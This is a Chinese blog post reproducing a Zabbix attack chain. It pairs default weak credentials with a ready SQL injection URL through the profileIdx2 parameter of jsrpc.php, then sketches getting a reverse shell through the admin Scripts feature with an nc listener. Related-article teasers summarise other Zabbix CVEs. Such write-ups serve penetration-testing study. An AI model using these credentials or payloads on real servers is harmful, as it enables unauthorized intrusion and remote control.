Zabbix 注入到命令执行漏洞复现

最新推荐文章于 2025-10-24 09:50:12 发布
原创 最新推荐文章于 2025-10-24 09:50:12 发布 · 1.4k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#信息安全 #安全漏洞

本文演示了如何通过Zabbix的SQL注入漏洞获取敏感信息,并进一步利用命令执行漏洞反弹shell,实现远程控制。文中详细介绍了利用过程,包括弱口令测试、SQL注入payload构造、反弹shell命令设置及监听等步骤。

@Adminxe

Zabbix 站点进行测试,

zabbix常用弱口令  admin / zabbix  或者  guest 空口令

外面注入exp  http://0.0.0.0/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

注入漏洞参数:profileIdx2 ,可以用sqlmap 尝试跑注入

—————————————————————————————————————

利用口令登陆以后开始反弹shell

管理—脚本,在命令写入反弹shell命令,在VPS开始nc监听

最低0.47元/天 解锁文章
Zabbix Server trapper 命令注入漏洞 (CVE-2017-2824)
李同學的安全圈
06-30 1597
Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。其Server端 trapper command 功能存在一处代码执行漏洞,特定的数据包可造成命令注入,进而远程执行代码。攻击者可以从一个Zabbix proxy发起请求,从而触发漏洞...
zabbix SQL注入漏洞复现(CVE-2024-42327)
iSee857的博客
12-04 1607
Zabbix 前端上具有默认用户角色或任何其他授予 API 访问权限的角色的非管理员用户帐户均可利用此漏洞。addRelatedObjects 函数中的 CUser 类中存在 SQLi,此函数由 CUser.get 函数调用,每个具有 API 访问权限的用户均可使用该函数。
Zabbix漏洞
weixin_44237647的博客
11-20 1397
搜索方法:inurl:Zabbix/dashboard.php 漏洞说明: zabbix的某处存在报错注入,也可以使用sqlmap对报错点进行注入 报错点是profileIdx2= 发现用户名不是name字段,而是alias字段。与网上流传的exp的有所不同。 脚本参照前辈: 独自等待 https://www.waitalone.cn/ 更改为python3版本 import requests import os import sys import re def checkSql(): payloa
Zabbix 命令执行漏洞复现:原理分析+环境搭建+渗透实践(CVE-2020-11800)
最新发布
mooyuan的网络安全博客
10-24 1193
本文详细分析了Zabbix的CVE-2020-11800远程代码执行漏洞,该漏洞存在于Zabbix 3.0.31及之前版本中,CVSS评分9.8。漏洞利用Zabbix Server的自动注册功能未经验证处理恶意请求的特性,通过10051端口注入命令并执行。文章提供了完整的Docker环境搭建方法,并演示了渗透测试过程:首先配置Zabbix的自动注册功能,然后利用PoC脚本发送伪造请求,最终在服务器上成功创建文件验证RCE。整个攻击过程无需认证,直接通过10051端口实现代码执行,危害性极大。
请注意!Zabbix高危SQL注入漏洞分析
weixin_34395205的博客
10-18 542
0x01 漏洞概述zabbix是一个开源的企业级性能监控解决方案。近日,zabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞,***者无需授权登陆即可登陆zabbix管理系统,也可通过script等功能轻易直接获取zabbix服务器的操作系统权限。 但是无需登录注入这里有个前提,就是zabbix开启了guest权限。而在zabbix中,guest的默认密码为空。...
zabbix latest.php SQL注入漏洞(CVE-2016-10134)
菜鸟耿耿
10-07 1694
zabbix latest.php SQL注入漏洞(CVE-2016-10134) zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。 一.环境搭建 zabbix 2.2.x, 3.0.0-3.0.3版本存在SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统,进入后台后script等功能直接获取zabbix服务器的操作系统权限。 攻击机IP:192.168.35.128 靶机IP: 192.168.35.1
Zabbix注入漏洞复现
qq_43590351的博客
08-31 1705
CVE-2016-10134
Zabbix 远程代码执行漏洞复现(CVE-2020-11800
m0_48520508的博客
03-08 5806
0x00简介 abbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。zabbix由2部分构成,zabbix server与可选组件zabbix agent。zabbix server可以通过SNMP,zabbix agent,ping,端口监视等方法提供对远程服务器/网络状态的监视,数据收集等功能,它可以运行在Linux,Solaris,HP-UX,A
vulhub漏洞复现77_zabbix
weixin_44193247的博客
02-14 1729
vulhub漏洞复现练习篇
警惕!Zabbix曝出严重漏洞,紧急修复指南速看
OpsEye的博客
12-04 1038
漏洞编号漏洞类型:SQL注入漏洞漏洞位置:Zabbix前端的CUser类中的addRelatedObjects函数漏洞影响:未对输入数据进行充分验证和转义,导致具有API访问权限的恶意用户可以通过user.get API传递特制输入触发SQL注入攻击。
Zabbix SQL注入漏洞分析
若有战,召必回
01-07 1281
漏洞简介Zabbix 是一款开源的网络监控和报警系统,用于监视网络设备、服务器和应用程序的性能和可用性。攻击者可以通过API接口,向 user.get API端点发送恶意构造的请求,注入SQL代码,以实现权限提升、数据泄露或系统入侵。影响版本环境搭建参考https://forum.butian.net/share/3056访问https://cdn.zabbix.com/zabbix/appliances/stable/7.0/7.0.0/
zabbix注入利用工具
01-03
zabbix注入利用工具,超级好用了,常用的安全测试工具
zabbix漏洞利用 Zabbix Server远程代码执行漏洞CVE-2017-2824 2.4.X均受影响
weixin_33849215的博客
09-01 1441
近日,Zabbix Server 2.4.X的trapper命令功能中被曝出存在可利用的代码执行漏洞(CVE-2017-2824)。 一组特制的数据包可能导致命令注入,导致远程执行代码。 攻击者可以从活动的Zabbix Proxy发出请求以触发此漏洞。该漏洞位于Zabbix代码的“Trapper”部分,这是允许代理和服务器通信的网络服务(TCP端口100...
Zabbix Server trapper命令注入漏洞(CVE-2017-2824)
EC_Carrot的博客
08-21 1209
漏洞简介 Zabbix Server是拉脱维亚Zabbix SIA公司的一套应用于服务器端的开源的监控系统。该系统可监视各种网络参数,并提供通知机制让系统管理员快速定位、解决存在的各种问题。 Zabbix Server 2.4.X版本中的trapper command功能存在远程代码执行漏洞。远程攻击者可利用该漏洞注入命令,执行代码。 漏洞复现 使用这个简单的POC来复现漏洞: import sys import socket import json import sys def send(ip, da
请求zabbix_【更新】Zabbix 远程代码执行漏洞(CVE202011800
weixin_36251052的博客
01-16 502
漏洞名称 :Zabbix 远程代码执行漏洞CVE-2020-11800威胁等级 : 高危影响范围: Zabbix 2.2.18 -2.2.23Zabbix 3.0 -3.0.30 Zabbix3.2-3.2.11漏洞类型 :远程代码执行利用难度 : 高 漏洞分析 1组件介绍Zabbix是一个基于WEB界面的分布式系统监视以及网络监视的企业级...
CVE-2017-2824 zabbix 命令注入漏洞(未授权访问/绕过登录)
qq_41567985的博客
09-27 1182
Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。其Server端 trapper command 功能存在一处代码执行漏洞,特定的数据包可造成命令注入,进而远程执行代码。命令执行后,执行docker-compose ps查看容器是否全部成功启动,如果没有,可以尝试重新执行docker-compose up -d。总结一下: 其中那个多试几次就好,还有,超时时间改小一点,不要极端,不然很难反弹shell。---->可见-权限算太高。
zabbix漏洞总结
qq_45300786的博客
03-10 1904
github 维梓梓 https://blog.csdn.net/weixin_43571641/article/details/108317554 https://www.jianshu.com/p/43d86d7ed3a5 https://www.cnblogs.com/itworks/p/7159477.html https://www.cnblogs.com/echoonly/p/15210051.html https://blog.csdn.net/qq_43645782/article/deta
震惊——某白帽破解zabbix系统,实现命令执行,最终获取shell
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
05-19 2496
如果你坚持了自己的梦想,全世界都会为你让路。
漏洞复现Zabbix弱口令再到命令执行Getshell
cjstang的博客
06-29 3694
Zabbix使用默认口令成功进入平台,写入shell脚本反弹shell
Zabbix 3.0.1:远程执行命令配置与示例
本文主要介绍了如何在Zabbix中配置远程执行命令,特别是在Zabbix触发器达到预设阀值时执行相应的动作。环境为基于CentOS 7的Zabbix 3.0.1 server和agent。文章强调了几个关键注意事项,如远程命令由server端向agent...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adminxe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值